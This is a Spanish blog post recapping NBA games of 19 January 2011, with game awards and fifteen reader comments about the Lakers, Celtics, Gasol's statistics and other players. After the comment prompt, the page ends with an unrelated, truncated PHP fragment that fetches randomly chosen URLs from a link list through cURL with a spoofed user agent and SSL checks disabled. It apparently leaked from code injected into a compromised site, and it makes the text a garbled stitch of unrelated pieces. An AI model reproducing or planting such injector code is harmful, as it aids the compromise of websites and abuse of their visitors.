La crónica (19/01/2011)

20 de January de 2011 por TheDeerHunter

Jornada intensiva, de infarto. Hasta 3 choques resueltos en el tiempo extra en nada menos que un total de 13. No hay cuerpo para resistir tanto frenesí baloncestístico un miércoles por la noche.

Orlando se llevó el gato al agua contra los Sixers en la prórroga y por un solo punto después de haber visto bailar sobre su aro al balón en el mismo final del tiempo reglamentario. La mejor defensa a Howard fue correrlo a boinazos, haciéndole sufrir de lo lindo en el patíbulo de los libres. 5 tiros a canasta y 22 libres. Metiendo sólo 10 sale a cuenta que le den con todo. No hemos hablado apenas de él, pero uno de los grandes beneficiados de los movimientos de su equipo ha sido Ryan Anderson y anoche mostró su talento siendo el más afinado de su equipo. El turco y Nelson también estuvieron bastante bien.

Los Hornets también lo tuvieron perdido tanto el reglamentario como en el extra contra Memphis. Se rehicieron en un par de arranques de casta de Chris Paul (precisamente), un poco de suerte, alguna que otra polémica y decisiones equivocadas en el peor momento del mundo por parte de los osetes. Otro que mencionábamos ayer, Aldridge, también resultó decisivo en otra apurada e importantísima (además de afortunada) victoria ante los Kings. El mejor partido de Batum este curso y una buena aportación de Rudy. Por si faltaba emoción los Warriors también ganaron de milagro a Indiana en un duelo fabuloso entre Monta y Granger. Eso sí, ellos sin prórroga.

Fuera del universo de las bocinas y de los tiros desesperados, los Spurs a lo suyo a costa de Toronto, los Celtics con Garnett también a lo suyo (algo más apurados) contra Detroit… y los Lakers también a lo suyo, que es regalar partidos a sus rivales más necesitados. Le tocó a Dallas que no estaban ganando a nadie. Kidd y Marion que andaban para abajo resucitados súbitamente. 5 de 8 para el base en triples, ahí es nada.

Los perseguidores de Portland, excepto Memphis, ganaron todos. Los Suns sin mucha historia sobre los Cavs; los Rockets sobre unos Knicks de bajona…y también los Clippers en el esperado duelo Griffin vs Love. Ambos estuvieron muy bien, sin números fantabulosos, pero lo realmente decisivo es que 6 tíos de los Clippers estuvieran en dobles figuras. Ya hemos dicho otras veces que la defensa de Minnesotta tiene toda la culpa de sus penurias.

En el “affer” Melo novedades. Los Nets se desmarcan de la puja por el jugador. Curiosamente esto les dió tranquilidad a ambos. Los Nets tumbaron nada menos que a Utah y Melo estuvo imparable ante Durant. Los Nuggets doblegaron a los Thunder.

Por último Milwaukee ganó a Washington con una gran actuación de Maggette, Dooling y de lentejita Boykins.

MVP: Destaca el partido de Carmelo Anthony, reaccionando a su mala situación. Sin embargo el hombre de la jornada fue indiscutiblemente Monta Ellis con sus 36 puntos, 5 rebotes y 6 asistencias y su pedazo de clutch increíble para matar a los Pacers.

El rookie: Dejando de lado a Griffin en otra dimensión (aunque en esta ocasión sea más mundana) hoy destacaremos para romper la rutina a Greg Monroe. De lo más positivo del curso para los Pistons (desde que han decidido empezar a sacarlo) y hoy un 13-9 anotando todo frente a Shaquille.

La sorpresa: Que Kidd meta un 5 de 8 en triples, o que los Clippers muestren una cara colectiva que no recordaba ni el más viejo del lugar… pero particularmente me quedo con el partido combinado de Farmar y Vujacic frente a Utah y en especial los 7 rebotazos del segundo. ¿Quién son los paquetes ahora?

La decepción: Tras una gran racha de juego ayer DeMarcus Cousins cuajó un partido lamentable emparejado con ¡Dante Cunningham!! Su juego lastró a su equipo en una inmejorable oportunidad de acumular otra victoria.

El mayor esfuerzo en vano: Hacía tiempo que no le veíamos por aquí cuando en otras temporadas el premio llevaba asociado su nombre. Danny Granger no pudo con Monta a pesar de sus 32 puntos 13 rebotes y 6 asistencias.

Comenta

15 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Los Celtics siguen pasándolo mal en este cargadísimo mes de Enero para ellos pero a base de veteranía y saber estar en el final de los partidos van sacándolos adelante. grande Ray Allen que a pesar de su flojo partido no le temblo la muñeca para jugarse el tiro que les ponía por delante en el último minuto.
    Los Lakers o como regalar un partido. En los 2 primeros cuartos los Mavs parecían ese equipo que venia decaido y sin ganar en mucho tiempo. Su defensa no existía pero los Lakers les dejaron ir cogiendo confianza y lo acabaron pagando caro. Cuando quisieron ponerse las pilas ya se habían subido a las barbas. Fenomenal Kidd, parece en una segunda juventud. Estos partidos perdidos les están empezando a poner las cosas difíciles para la ventaja de campo ante Spurs y Celtics y ¿Alguien cree que no será importante en una posible serie a 7 partidos contra estos 2 equipos de “viejos zorros”?

      Citar

  2. CAMPO2 dice:
    #2

    Ayer vi el Nets Vs Jazz y es cierto, a la maquina le ha sentado el cambio fenomenal, tambien decir que Brook Lopez debería aplicarse un poco mas en defensa, ya que hay fases del partido por no decir todo que esta de miranda y no lucha por ningun rebote.

    Saludos

      Citar

  3. Denise dice:
    #3

    La temporada de Lakers está siendo bastante mala por ahora, a pesar de el equipazo del que dispone Phil (mucho mejor que el del threepeat o el de los 3 ultimos años), cuando juegan contra rivales menores, ganan por su “pegada” (usando terminos futbolisticos), pero cuando juegan contra candidatos al anillo, la pegada no sirve, hay que demostrar algo más de juego, si mal no recuerdo, llevan un 0-3 cuando se han enfrentado a equipos candidatos a anillo (Heat, Spurs, Mavs).
    El MVP se lo daría a Grant Hill y sus 27-12. Qué merito estar promediando un 15-5 con más del 50% en tiros de campo, con 39 años y con lesiones gravísimas a lo largo de su carrera. Que habría sido de este hombre sin lesiones…

      Citar

  4. sergio dice:
    #4

    Los Lakers para mi estan suspendiendo esta temporada. Me esperaba mas de ellos. Solo llevan 6 victorias frente a equipos por encima del 50% y creo que solo dos ante equipos por encima del 60% (Chicago y Oklahoma y las dos por 7 puntos). Vale que estos Lakers parecen predestinados a dar de si en Playoffs, pero este año hay muchas mas alternativas y los factores cancha se anticipan muy importantes como dice GreenPride. Creo que Miami, Boston y Spurs van por encima de ellos ahora mismo en cuanto a aspiraciones reales.

      Citar

  5. TheDeerHunter dice:
    #5

    No sé el resto… pero a un cruce con ventaja campo los Celtics serían muy favoritos con respecto a Lakers. Mucho tiene que mejorar el juego para que los Lakers le dieran la vuelta a esa hipotética final.
    Eso si los Spurs no nos la arman antes, que tampoco debería extrañar tanto.

      Citar

  6. scriers dice:
    #6

    Cosas que me fijo de esta liga, raras.

    Lowry, hay que ver, ¿eh? No parece el mismo cabra loca que pasó por Memphis, y está en 0,365 en triples, que no está nada malote.
    Los Nicks siguen dando la sensación de patinar con cualquiera, y de ganar a cualquiera.
    Toronto es un equipo divertido de ver, en serio. Pero le falta talento y fuerza en la pintura, así es muy complicado. Pero diría que hacen buen baloncesto, pese a su record.
    Lo frustrante que tiene que ser para Beasley y Love esta temporada.

      Citar

  7. sergio dice:
    #7

    Lo que dice Scriers de los Raptors es totalmente cierto. A grandes rasgos yo diría que son los Suns del Este. Poca potencia en la pintura y anotadores versatiles por fuera. Eso si, confio mucho en la progresion de Ed Davis. Para mi es otro grandisimo jugador de este draft. Reggie Evans, Bargnani, Amir Johnson, Ed Davis y Dorsey son muy diferentes y dan muchas posibilidades en las posiciones altas… pero no terminan de explotar aportar lo que necesita el equipo

      Citar

  8. TheDeerHunter dice:
    #8

    Cágate lorito:

    Pau es el 6º jugador más rápido en la historia llegando a los 13.000 puntos, 6.000 rebotes, 2.000 asistencias y 1.000 tapones. En 693 partidos adelanta nada menos que a Shaq y se queda sólo por detrás de David Robinson, Garnett, Kareem, Duncan y Webber.

    Vaya tela Daimiel!!!

    Fuente marca (cágate más lorito todavía)

      Citar

  9. Rompe dice:
    #9

    Por cierto, parece que DeRozan reemplazará a Jennings en el concurso de mates. A ver si se luce un poco más que el año pasado…

      Citar

  10. Viva_Dirk dice:
    #10

    @Scriers: Igual para Love es frustrante, pero a Beasley siempre le ha importado un carajo perder partidos, prefiere mil veces meter 40 puntos y que el equipo pierda, hay que tener un bloque muy bueno para Beasley funcione en bien del equipo.

      Citar

  11. Rompe dice:
    #11

    Como dice Viva, igual no es tan frustrante, para ninguno de los dos. El estar en un equipo que no aspira a nada le está permitiendo hacer historia a Love, y perder los partidos tras la primera mitad hace que las defensas se relajen, y parte de los números vienen precisamente de ahí. Los números y la publicidad que se está ganando el chaval no creo que la consiguiera en muchos más equipos…

      Citar

  12. aro_pasado_no_newtoniano dice:
    #12

    Tú, deer, ¿te ves todos los partidos?

    Pau es el sexto más rápido,,,,pero ¿el jugador con menor edad? ¿el jugador con menos minutos de juego para lograrlo? ¿el jugador con menos partidos? ¿el sexto jugador con menos partidos de regular season?

    Temporadón también el de Ridnour,,,llevando al ostracismo total a Flynn, incluso habiendose recuperado.

      Citar

  13. Rompe dice:
    #13

    Creo, aro_pasado, que es en el menor número de partidos jugados…

      Citar

  14. TheDeerHunter dice:
    #14

    Sabes que sí, @aropasado… los vemos juntos. Ninguno de los dos conocemos el significado de la palabra dormir.

    El dato de Gasol se refiere a lo que se refiere. Punto. A mí me parece grandioso simplemente con eso.

      Citar

  15. scriers dice:
    #15

    Es que son números de una constancia enorme, los jugadores muchas veces viven de rachas. Estos cracks no, viven toda su vida haciendo puntos, dando pases, cogiendo rebotes y haciendo tapones. A veces pienso que se morirán así.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>